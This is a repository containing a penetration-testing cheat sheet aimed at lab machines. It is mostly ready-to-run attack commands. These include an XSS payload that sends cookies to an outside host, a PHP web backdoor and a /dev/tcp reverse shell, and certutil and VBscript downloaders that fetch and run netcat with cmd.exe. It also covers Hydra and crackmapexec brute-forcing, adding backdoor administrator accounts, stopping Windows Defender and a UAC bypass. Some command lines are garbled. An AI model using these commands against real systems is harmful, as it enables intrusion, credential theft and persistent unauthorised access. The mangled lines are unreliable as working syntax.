├── .gitattributes ├── SUMMARY.md ├── privilege-escalation-tools.md └── README.md /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /SUMMARY.md: -------------------------------------------------------------------------------- 1 | # Table of contents 2 | 3 | * [Cheat Sheet](README.md) 4 | * [Privilege Escalation Tools](privilege-escalation-tools.md) 5 | 6 | -------------------------------------------------------------------------------- /privilege-escalation-tools.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | A List of amazing priv esc scripts I have found from personal experience. If 4 | you have found other tools plz feel free to dm me about them. 5 | --- 6 | 7 | # Privilege Escalation Tools 8 | 9 | ## WINDOWS 10 | 11 | * winPEAS 12 | * SeatBelt 13 | * Mssql 14 | * PowerUpSQL 15 | 16 | ## LINUX 17 | 18 | * linPEAS 19 | * linenum 20 | * inux-smart-enumeration 21 | 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # For a more up to date Cheatsheets, References and notes on various red teaming/pentesting topics. Check out my frequently updated repo 2 | # [HackAllTheThings](https://github.com/akenofu/HackAllTheThings) 3 | 4 | *** 5 | # Cheat Sheet 6 | 7 | ## ENUMERATION 8 | 9 | All around scanner 10 | 11 | > $ python3 [autorecon.py](http://autorecon.py) > $ip -v 12 | 13 | Host Discovery 14 | 15 | > $ nmap -sn 10.11.1.1-254 -vv -oA hosts 16 | > $ netdiscover -r 10.11.1.0/24 17 | > $ crackmapexec 192.168.10.0/24 18 | > $ arp-scan --interface=eth0 192.168.0.0/24 19 | 20 | DNS server discovery 21 | 22 | > $ nmap -p 53 10.11.1.1-254 -vv -oA dcs 23 | 24 | ## PORT 25 | 26 | Port Scanning & Service Detection 27 | 28 | > $ unicornscan -mT -I 10.11.1.252:a -v 29 | > $ unicornscan -mU -I 10.11.1.252:p -v 30 | > $ nmap -sC -sV -Pn -oA -vv standard\_tcp > $ip $ nmap -sC -sV -sU -Pn -oA -vv standard\_udp > $ip $ nmap -p -sU -sT -Pn 0-65535 -vv -oN all\_ports > $ip $ unicornscan -mU -I 192.168.24.53:a -v -l unicorn\_full\_udp.txt ; unicornscan -mT -I 192.168.24.53:a -v -l unicorn\_full\_tcp.txt 31 | 32 | Vulnerability Scanning 33 | 34 | > $nmap -Pn -sT -sU -p > $ports --script=\*vuln\* -vv -oN nmap\_vuln > $ip 35 | 36 | Banner Grabbing 37 | 38 | > $ nc -nv > $ip > $port 39 | 40 | ## DNS 41 | 42 | Find DNS server: 43 | 44 | > $ nslookup thinc.local 10.11.1.221 45 | > $ dig @10.11.1.221 thinc.local 46 | 47 | Forward Lookup Brute Force: 48 | 49 | > $ dnsrecon -d [example.com](http://example.com) -D /usr/share/wordlists/dnsmap.txt -t std --xml dnsrecon.xml 50 | 51 | Reverse Lookup Brute Force: 52 | 53 | > $ dnsrecon -d [demo.com](http://demo.com) -t rvl 54 | 55 | DNS Zone Transfers: 56 | 57 | > $ host -l domain > $ip $ dnsrecon -d [megacorpone.com](http://megacorpone.com) -t axfr 58 | > $ dnsenum [zonetransfer.me](http://zonetransfer.me) 59 | 60 | ## FTP 61 | 62 | Vulnerability Scanning 63 | 64 | > $ nmap -p 21 --script="+\*ftp\* and not brute and not dos and not fuzzer" -vv -oN ftp > $ip 65 | 66 | Deafult Creds 67 | 68 | > $ hydra -s 21 -C /usr/share/sparta/wordlists/ftp-default-userpass.txt -u -f > $ip ftp 69 | 70 | ## FTP MANUAL SCANS 71 | 72 | Anonymous login 73 | 74 | Enumerate the hell out of the machine! 75 | 76 | > $ OS version 77 | > $ Other software you can find on the machine \(Prog Files, yum.log, /bin\) 78 | > $ password files 79 | > $ DLLs for msfpescan / BOF targets 80 | 81 | Do you have UPLOAD potential? 82 | 83 | > $ Can you trigger execution of uploads? 84 | > $ Swap binaries? 85 | 86 | Public exploits for ftp server software 87 | 88 | ## HTTP\(S\) 89 | 90 | Vulnerability Scanning 91 | 92 | > $ nmap -p 80,443 --script="+\*http\* and not brute and not dos and not fuzzer" -vv -oN http\(s\) > $ip $ Nikto -port 80,443 -host > $ip -o -v nikto.txt or $ nikto -Option USERAGENT=Mozilla -url=[http://10.11.1.24](http://10.11.1.24) -o nikto.txt 93 | 94 | Directories 95 | 96 | > $ gobuster dir -u [https://10.11.1.35](https://10.11.1.35) -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -t 50 -k -o gobuster 97 | 98 | Word Press 99 | 100 | > $ wpscan --url [http://10.11.1.251/wp](http://10.11.1.251/wp) 101 | 102 | ## MANUAL HTTP SCANS 103 | 104 | Check the source code 105 | 106 | Technologies used 107 | 108 | > $whatweb > $ip:80 --color=never --log-brief="whattheweb.txt" 109 | 110 | curl -s \[http:// > $ip/robots.txt\]\(http:// > $ip/robots.txt\) 111 | 112 | Burp 113 | 114 | > $ get params 115 | > $ post params 116 | > $ cookies 117 | > $ user agents 118 | > $ referrers 119 | > $ all the headers 120 | > $ change get requests to posts 121 | > $ take note of all error codes 122 | > $ fuzz parameter values, and names, etc. 123 | 124 | Things to be on look for: 125 | 126 | > $ Default credentials for software 127 | > $ SQL-injectable GET/POST params 128 | > $ XSS 129 | > Test 130 | > $ <script> alert\("Hello! I am an alert box!!"\);</script> 131 | > $ <iframe SRC="http:10.11.0.106/xss\_test.html" height = "0" width ="0"></iframe> 132 | > Exploit 133 | > $ <script>new Image\(\).src="[http://10.11.0.106/bogus.php?output=](http://10.11.0.106/bogus.php?output=)"+document.cookie;</script> 134 | > $ LFI/RFI through ?page=foo type params 135 | > LFI: 136 | > $ /etc/passwd \| /etc/shadow insta-win 137 | > $ /var/www/html/config.php or similar paths to get SQL etc creds 138 | > $ ?page=php://filter/convert.base64-encode/resource=../config.php 139 | > $ ../../../../../boot.ini to find out windows version 140 | > RFI: 141 | > $ Have your PHP/cgi downloader ready 142 | > $ <?php include \_GET\\['inc'\\]; ?> simplest backdoor to keep it dynamic without anything messing your output > $ Then you can just [http://IP/inc.php?inc=http://](http://IP/inc.php?inc=http://) > $YOURIP/bg.php and have full control with minimal footprint on target machine $ get phpinfo\(\) 143 | 144 | HTTPS 145 | 146 | > $ Heartbleed / CRIME / Other similar attacks 147 | > $ Read the actual SSL CERT to: 148 | > $ find out potential correct vhost to GET 149 | > $ is the clock skewed 150 | > $ any names that could be usernames for bruteforce/guessing 151 | 152 | LFI Linux Files: 153 | 154 | > $ /etc/issue 155 | > $ /proc/version 156 | > $ /etc/profile 157 | > $ /etc/passwd 158 | > $ /etc/shadow 159 | > $ /root/.bash\_history 160 | > $ /var/mail/root 161 | > $ /var/spool/cron/crontabs/root 162 | > $ /etc/sysconfig/iptables 163 | > $ /etc/sysconfig/ip6tables 164 | 165 | LFI Windows Files: 166 | 167 | > $ %SYSTEMROOT%\repair\system 168 | > $ %SYSTEMROOT%\repair\SAM 169 | > $ %SYSTEMROOT%\repair\SAM 170 | > $ %WINDIR%\win.ini 171 | > $ %SYSTEMDRIVE%\boot.ini 172 | > $ %WINDIR%\Panther\sysprep.inf 173 | > $ %WINDIR%\system32\config\AppEvent.Evt 174 | > $ c:\windows\system32\drivers\etc\hosts 175 | 176 | ## MYSQL 177 | 178 | Vulnerability Scanning 179 | 180 | > $ nmap -p 3306 --script="+\*mysql\* and not brute and not dos and not fuzzer" -vv -oN mysql > $ip 181 | 182 | Deafult Creds 183 | 184 | > $ hydra -s 3306 -C /usr/share/sparta/wordlists/mysql-default-userpass.txt -u -f > $ip ftp 185 | 186 | Public Exploit 187 | 188 | ## RPC 189 | 190 | Find NFS Port 191 | 192 | > $ nmap -p 111 --script=rpcinfo.nse -vv -oN nfs\_port > $ip 193 | 194 | Services Running 195 | 196 | > $ rpcinfo –p > $ip $ rpcbind -p rpcinfo –p x.x.x.x 197 | 198 | Null Session/User Rpc login 199 | 200 | > $ rpcclient -U "" > $ip 201 | > ▪ srvinfo 202 | > ▪ enumdomusers 203 | > ▪ enumprivs 204 | > ▪ enumalsgroups domain 205 | > ▪ lookupnames administrators 206 | > ▪ querydominfo 207 | > ▪ enumdomusers 208 | > ▪ queryuser john 209 | 210 | ## NFS 211 | 212 | Show Mountable NFS Shares 213 | 214 | > $ nmap --script=nfs-showmount -oN mountable\_shares > $ip $ showmount -e > $ip 215 | 216 | List NFS exported shares. If 'rw,no\_root\_squash' is present, upload and execute sid-shell 217 | 218 | > $ chown root:root sid-shell; chmod +s sid-shell 219 | 220 | ## POP3 221 | 222 | Enumerating user accounts 223 | 224 | > $ nc -nv > $ip 25 $ VRFY user 225 | > $ USER user 226 | > $ EXPN user 227 | 228 | ## SMB&NETBIOS 229 | 230 | Over All scan 231 | 232 | > $ enum4linux -a > $ip 233 | 234 | Guest User and null authentication 235 | 236 | > $ smbmap -u anonymous -p anonymous -H 10.10.10.172 237 | > $ smbmap -u '' -p '' -H 10.10.10.172 238 | 239 | Vulnerability Scanning 240 | 241 | > $ nmap --script="+\*smb\* and not brute and not dos and not fuzzer" -p 139,445 -oN smb-vuln > $ip 242 | 243 | Enumerate Hostnames 244 | 245 | > $ nmblookup -A > $ip 246 | 247 | List Shares with no creds and guest account 248 | 249 | > $ smbmap -H \[ip/hostname\] -u anonymous -p hokusbokus -R 250 | > $ nmap --script smb-enum-shares -p 139,445 > $ip 251 | 252 | List Shares with creds 253 | 254 | > $ smbmap -H \[ip\] -d \[domain\] -u \[user\] -p \[password\] -r --depth 5 -R 255 | 256 | Connect to share 257 | 258 | > $ smbclient \\\\[ip\]\\\[share name\] 259 | 260 | Netbios Information Scanning 261 | 262 | > $ nbtscan -r > $ip/24 263 | 264 | Nmap find exposed Netbios servers 265 | 266 | > $ nmap -sU --script nbstat.nse -p 137 > $ip 267 | 268 | Mount smb share: 269 | 270 | > $ mount -t cifs //<server ip>/<share> <local dir> -o username=”guest”,password=”” 271 | 272 | ## SNMP 273 | 274 | Enumeration Tools 275 | 276 | > $ Onesixtyone – c <community list file> -I <ip-address> 277 | > $ Snmpwalk -c <community string> -v<version> > $ip 1.3.6.1.2.1.25.4.2.1.2 $ snmp-check > $ip 278 | 279 | Default Community Names: 280 | 281 | > $ public, private, cisco, manager 282 | 283 | Enumerate MIB: 284 | 285 | > $ 1.3.6.1.2.1.25.1.6.0 System Processes 286 | > $ 1.3.6.1.2.1.25.4.2.1.2 Running Programs 287 | > $ 1.3.6.1.2.1.25.4.2.1.4 Processes Path 288 | > $ 1.3.6.1.2.1.25.2.3.1.4 Storage Units 289 | > $ 1.3.6.1.2.1.25.6.3.1.2 Software Name 290 | > $ 1.3.6.1.4.1.77.1.2.25 User Accounts 291 | > $ 1.3.6.1.2.1.6.13.1.3 TCP Local Ports 292 | 293 | SNMP V3 294 | 295 | > $ nmap -p 161 --script=snmp-info > $ip $ default creds: 296 | > ▪ /usr/share/metasploit-framework/data/wordlists/snmp\_default\_pass.txt 297 | 298 | ## DOMAIN 299 | 300 | Leak DC hostname: 301 | 302 | > $ noslookup 303 | > server 10.10.10.172 304 | > set type=ns 305 | > 10.10.10.172 306 | > 127.0.0.1 307 | 308 | Nmap: 309 | 310 | > $ nmap -p 53 --script=\*dns\* -vv -oN dns > $ip 311 | 312 | ## LDAP/Active Directory 313 | 314 | --Look for anonymous bind 315 | 316 | > $ ldapsearch -x -b "dc=megabank,dc=local" "\*" -h > $ip 317 | 318 | ## FILE TRANSFER 319 | 320 | Simple Servers: 321 | 322 | > $ python -m SimpleHTTPServer 80 323 | > $ python -m pyftpdlib -p 21 -w -d /tmp 324 | > $ ptftpd -p 69 -v eth0 /tmp 325 | > $ impacket-smbserver -username guest -password guest -smb2support share > $\(pwd\) // Might need to remove -smb2support option 326 | 327 | Tools: 328 | 329 | > $ Linux & Windows \( Newer Windows versions only \) 330 | > ▪ wget [http://10.11.0.106/nc.exe](http://10.11.0.106/nc.exe) -O nc.exe 331 | > ▪ curl [http://10.11.0.106/nc.exe](http://10.11.0.106/nc.exe) -o nc.exe 332 | > $ Windows \( Should work on most Windows versions\) 333 | > ▪powershell \(New-Object System.Net.WebClient\).DownloadFile\("[https://10.10.10.144/test.txt](https://10.10.10.144/test.txt)", "test.txt"\) 334 | > ▪net use Z: \\computer\_name\share\_name //Mount smb share 335 | > ▪ > $pass= "guest" \| ConvertTo-SecureString -AsPlainText -Force $cred = New-Object System.Management.Automation.PsCredential\('guest', > $pass\) 336 | > New-PSDrive -name guest -root \\10.10.15.53\share -Credential > $cred -PSProvider "filesystem" 337 | > ▪certutil.exe -urlcache -split -f "[http://10.11.0.106:8000/nc.exe](http://10.11.0.106:8000/nc.exe)" nc.exe && nc.exe -nv 10.11.0.106 443 -e cmd.exe 338 | > ▪VBscript 339 | > → echo strUrl = WScript.Arguments.Item\(0\) > wget.vbs 340 | > echo StrFile = WScript.Arguments.Item\(1\) >> wget.vbs 341 | > echo Const HTTPREQUEST\_PROXYSETTING\_DEFAULT = 0 >> wget.vbs 342 | > echo Const HTTPREQUEST\_PROXYSETTING\_PRECONFIG = 0 >> wget.vbs 343 | > echo Const HTTPREQUEST\_PROXYSETTING\_DIRECT = 1 >> wget.vbs 344 | > echo Const HTTPREQUEST\_PROXYSETTING\_PROXY = 2 >> wget.vbs 345 | > echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs 346 | > echo Err.Clear >> wget.vbs 347 | > echo Set http = Nothing >> wget.vbs 348 | > echo Set http = CreateObject\("WinHttp.WinHttpRequest.5.1"\) >> wget.vbs 349 | > echo If http Is Nothing Then Set http = CreateObject\("WinHttp.WinHttpRequest"\) >> wget.vbs 350 | > echcscript wget.vbs [http://10.11.0.6/wce32\_upx.exe](http://10.11.0.6/wce32_upx.exe) wce32\_upex.exe If http Is Nothing Then Set http = CreateObject\("MSXML2.ServerXMLHTTP"\) >> wget.vbs 351 | > echo If http Is Nothing Then Set http = CreateObject\("Microsoft.XMLHTTP"\) >> wget.vbs 352 | > echo http.Open "GET", strURL, False >> wget.vbs 353 | > echo http.Send >> wget.vbs 354 | > echo varByteArray = http.ResponseBody >> wget.vbs 355 | > echo Set http = Nothing >> wget.vbs 356 | > echo Set fs = CreateObject\("Scripting.FileSystemObject"\) >> wget.vbs 357 | > echo Set ts = fs.CreateTextFile\(StrFile, True\) >> wget.vbs 358 | > echo strData = "" >> wget.vbs 359 | > echo strBuffer = "" >> wget.vbs 360 | > echo For lngCounter = 0 to UBound\(varByteArray\) >> wget.vbs 361 | > echo ts.Write Chr\(255 And Ascb\(Midb\(varByteArray,lngCounter + 1, 1\)\)\) >> wget.vbs 362 | > echo Next >> wget.vbs 363 | > echo ts.Close >> wget.vbs 364 | > → cscript wget.vbs [http://10.11.0.6/wce32\_upx.exe](http://10.11.0.6/wce32_upx.exe) wce32\_upx.exe 365 | > ▪ FTP Non interactive mode 366 | > → ftp -A 10.11.0.106 367 | > → binary 368 | > → GET nc.exe 369 | > → bye 370 | > ▪ TFTP 371 | > → tftp -i 10.11.0.106 GET exploit.exe 372 | 373 | ## SHELLS 374 | 375 | Spawning a TTY Shell - Break out of Jail or limited shell You should almost always upgrade your shell after taking control of an apache or www user \(For example when you encounter an error message when trying to run an exploit sh: no job control in this shell \) 376 | 377 | Interactive shell: 378 | 379 | > $python -c 'import pty; pty.spawn\("/bin/bash"\)' $ echo os.system\('/bin/bash'\) 380 | 381 | Adjust Interactive shell: 382 | 383 | > $ Ctrl-Z 384 | > $ echo > $TERM //find term $ stty raw -echo //disable shell echo 385 | > $ fg 386 | > $ reset 387 | > $ export SHELL=bash 388 | > $ export TERM=xterm 389 | 390 | Php backdoor: 391 | 392 | > $ <?php echo shell\_exec\( > $\_GET\['cmd'\]\);?> 393 | 394 | Php shell: 395 | 396 | > $ <?php echo shell\_exec\('bash -i >& /dev/tcp/10.11.0.106/443 0>&1'\);?> 397 | > $ 398 | 399 | ## PSSWD CRACKING 400 | 401 | ```text 402 | > $ Look for the hash in online databases 403 | ``` 404 | 405 | Hashcat: 406 | 407 | > $ Find mode in hashcat 408 | > ▪ hashcat --example hashes 409 | > $ hashcat -m 0 hashes /usr/share/wordlists/rockyou.txt 410 | 411 | John: 412 | 413 | > $ john files --wordlist=/usr/share/wordlists/rockyou.txt 414 | 415 | ## PSSWD Mutation 416 | 417 | Hashcat 418 | 419 | > $ hashcat -m 0 bfield.hash /usr/share/wordlists/rockyou.txt -r rules 420 | 421 | ## PSSWD BruteForcing 422 | 423 | Crackmapexec 424 | 425 | > $ Enumerate password policy 426 | > ▪ crackmapexec 192.168.215.104 -u 'Administrator' -p 'PASS --pass-pol 427 | > $ Bruteforce SMB 428 | > ▪ crackmapexec smb 10.10.10.172 -u /root/users.lst -p /root/passwords.lst 429 | > $ Bruteforce winrm 430 | > ▪ crackmapexec winrm 10.10.10.172 -u /root/users.lst -p /root/passwords.lst 431 | 432 | Hydra 433 | 434 | > $ Hydra brute force against SNMP 435 | > ▪ hydra -P password-file.txt -v > $ip snmp 436 | 437 | ```text 438 | > $ Hydra FTP known user and rockyou password list 439 | ``` 440 | 441 | ▪ hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV > $ip ftp 442 | 443 | ```text 444 | > $ Hydra SSH using list of users and passwords 445 | ``` 446 | 447 | ▪ hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u > $ip ssh 448 | 449 | ```text 450 | > $ Hydra POP3 Brute Force 451 | ``` 452 | 453 | ▪ hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f > $ip pop3 -V 454 | 455 | ```text 456 | > $ Hydra SMTP Brute Force 457 | ``` 458 | 459 | ▪ hydra -P /usr/share/wordlistsnmap.lst > $ip smtp -V 460 | 461 | ```text 462 | > $ Hydra attack http get 401 login with a dictionary 463 | ``` 464 | 465 | ▪ hydra -L ./webapp.txt -P ./webapp.txt > $ip http-get /admin 466 | 467 | ```text 468 | > $ Hydra attack Windows Remote Desktop with rockyou 469 | ``` 470 | 471 | ▪ hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp:// > $ip 472 | 473 | ```text 474 | > $ Hydra brute force a Wordpress admin login 475 | ``` 476 | 477 | ▪ hydra -l admin -P ./passwordlist.txt > $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' 478 | 479 | ## POST EXPLOITATION LINUX 480 | 481 | Add user with root privs: 482 | 483 | > $ sudo useradd -ou 0 -g 0 john 484 | > $ sudo passwd John@1234 485 | 486 | Combie shadow and passwd files: 487 | 488 | > $ unshadow passwd.txt shadow.txt > passwords.txt 489 | 490 | Find listening services: 491 | 492 | > $ netstat -alp 493 | 494 | Copy ssh private kets: 495 | 496 | > $ /etc/ssh/ssh\_host\_dsa\_key 497 | > $ /etc/ssh/ssh\_host\_key 498 | 499 | Check interseting files 500 | 501 | > $ /var/log 502 | > $ /var/log/secure 503 | > $ /etc/passwd 504 | > $ /etc/shadow 505 | > $ ~/.bash\_history 506 | > $ ~/.mysql\_history 507 | > Check log files of some of the services: 508 | > $ http 509 | > $ ftp 510 | > $ ssh 511 | > ▪ grep 'sshd' /var/log/auth.log 512 | 513 | linux Post Exploitation: 514 | 515 | > $ ifconfig 516 | 517 | ## POST EXPLOITATION WINDOWS 518 | 519 | Backdoor User: 520 | 521 | > $ net user backdoor backdoor@123 /add 522 | > $ net localgroup administrators backdoor /add 523 | > $ net localgroup "Remote Desktop Users" backdoor /add 524 | > $ net user admin newpassword 525 | > Enabling RDP 526 | > $ netsh firewall add portopening TCP 3389 "Open Port 3389" ENABLE ALL 527 | > $ netsh firewall set portopening TCP 3389 proxy ENABLE ALL 528 | > $ netsh firewall set service RemoteDesktop enable 529 | > $ reg add "HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG\_DWORD /d 0 /f 530 | 531 | Disable RDP 532 | 533 | > $ reg add "HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG\_DWORD /d 1 /f 534 | > $ netsh firewall delete portopening protocol=TCP port=3389 535 | 536 | Check log files of some of the services: 537 | 538 | > $ http 539 | > $ ftp 540 | > $ ssh 541 | 542 | Windows Post Exploitation: 543 | 544 | > $ Arp -a 545 | > $ netstat -ano 546 | > $ ipconfig /all 547 | > $ route print 548 | > $ schtasks /query /fo LIST /v 549 | > $ netsh firewall show config 550 | > $ Net group 551 | > $ Net localgroup 552 | > $ \(for /R ".\" %A in \(\*.txt\) do echo %~fA %~zA\) \| findstr /v "echo 553 | > $ Net share 554 | > $ Power shell to Enumerate users and computers using powershell 555 | 556 | ## USEFUL LINUX COMMANDS 557 | 558 | Find file by name: 559 | 560 | > $ find /home/username/ -name "\*.err" 561 | 562 | Find writable directories: 563 | 564 | > $ find / -perm -o+w 565 | > $ find . -perm -o+w -exec chmod +t {} + 566 | > $ find / -writable 567 | > $ find / -type d \\( -perm -g+w -or -perm -o+w \\) -exec ls -adl {} \; \| grep drwxrwsr 568 | 569 | pipe to clipboard 570 | 571 | > $ ls \| xclip -selection c 572 | 573 | tar 574 | 575 | > $ create 576 | > ▪ tar -cvf linux\_priv\_esc.tar.gz /root/Desktop 577 | > $ unzip 578 | > ▪ tar xvzf linux\_priv\_esc.tar.gz 579 | 580 | kerbros auth 581 | 582 | > $ xfreerdp /u:alice /v:10.11.1.50 583 | 584 | ## USEFUL WINDOWS COMMANDS 585 | 586 | Find log files in directory 587 | 588 | > $ dir /s \*log\* 589 | 590 | Process 591 | 592 | > $ tasklist 593 | > $ taskkill /F /PID pid\_number 594 | 595 | Disable windows defender: 596 | 597 | > $ sc stop WinDefend 598 | 599 | UAC bypass: 600 | 601 | > $ echo > $username = "alice" > run.ps1 $ echo > $secpasswd = ConvertTo-SecureString "aliceishere" -AsPlainText -Force >> run.ps1 602 | > echo > $mycreds = New-Object System.Management.Automation.PSCredential \(" > $username", > $secpasswd\) >> run.ps1 > $ echo Start-Process veil\_meterpreter.bat -Credential \( > $mycreds\) >> run.ps1 603 | 604 | ```text 605 | > $ powershell -ExecutionPolicy Bypass -File run.ps1 606 | ``` 607 | 608 | ## PIVOTING 609 | 610 | Dynamic Port Forwading: 611 | 612 | > $ SSH 613 | > ▪ ssh -D 9000 root@ > $ip ▪ set proxychains.conf to 127.0.0.1 1080 ▪ proxy chains nc -nv 10.11.0.106 $ Reverse SSH from windows to my kali 614 | > ▪ systemctl start ssh.service 615 | > ▪putty.exe -ssh [root@10.11.0.106](mailto:root@10.11.0.106) 616 | 617 | Local port forward: 618 | 619 | ```text 620 | > $ Explanation 621 | ▪ ssh -L 80:localhost:80 SUPERSERVER 622 | ▪ a connection made to the local port 80 is to be forwarded to port 80 on SUPERSERVER. 623 | 624 | > $ SSH 625 | ▪ ssh -R sourcePort:forwardToHost:onPort connectToHost 626 | ``` 627 | 628 | Remote port forward: 629 | 630 | ```text 631 | > $ Explanation 632 | ▪ ssh -R 80:localhost:80 tinyserver 633 | ▪ a connection made to the remote port 80 on tiny server is to be forwarded to port 80 on my localhost. 634 | 635 | > $ SSH 636 | ▪ ssh -L sourcePort:forwardToHost:onPort connectToHost 637 | ``` 638 | 639 | Metasploit: 640 | 641 | > $ Dynamic Port Forwading 642 | > ▪ autoroute module 643 | > → set session to meterpreter session 644 | > ▪ socks4a module 645 | > → set srv port to \( no need to set host\) 646 | > ▪ set proxychains.conf to 127.0.0.1 1080 647 | 648 | --------------------------------------------------------------------------------